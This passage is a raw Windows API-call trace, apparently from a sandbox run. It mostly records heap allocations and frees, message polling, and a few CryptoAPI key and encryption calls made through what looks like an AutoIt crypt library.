hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6823) returned 0x440b3b8 [0075.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0075.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6823) returned 0x4418418 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0075.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0075.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0075.544] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0075.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0075.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0075.544] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0075.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0075.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0075.544] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0075.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0075.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0075.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0075.545] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0075.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0075.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.545] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.546] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0075.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0075.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0075.547] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0075.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0075.547] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0075.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0075.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0075.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0075.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0075.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0075.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0075.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0075.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0075.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0075.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0075.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0075.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0075.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0075.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0075.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0075.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0075.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0075.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0075.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ec8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0075.549] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2640, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2640*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0075.549] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.549] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.549] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.549] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.549] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.549] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.550] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.550] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.550] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.550] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.550] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.550] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.550] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0075.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0075.550] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x6823, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x6830) returned 1 [0075.550] CharLowerBuffW (in: lpsz="byte[26673]", cchLength=0xb | out: lpsz="byte[26673]") returned 0xb [0075.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 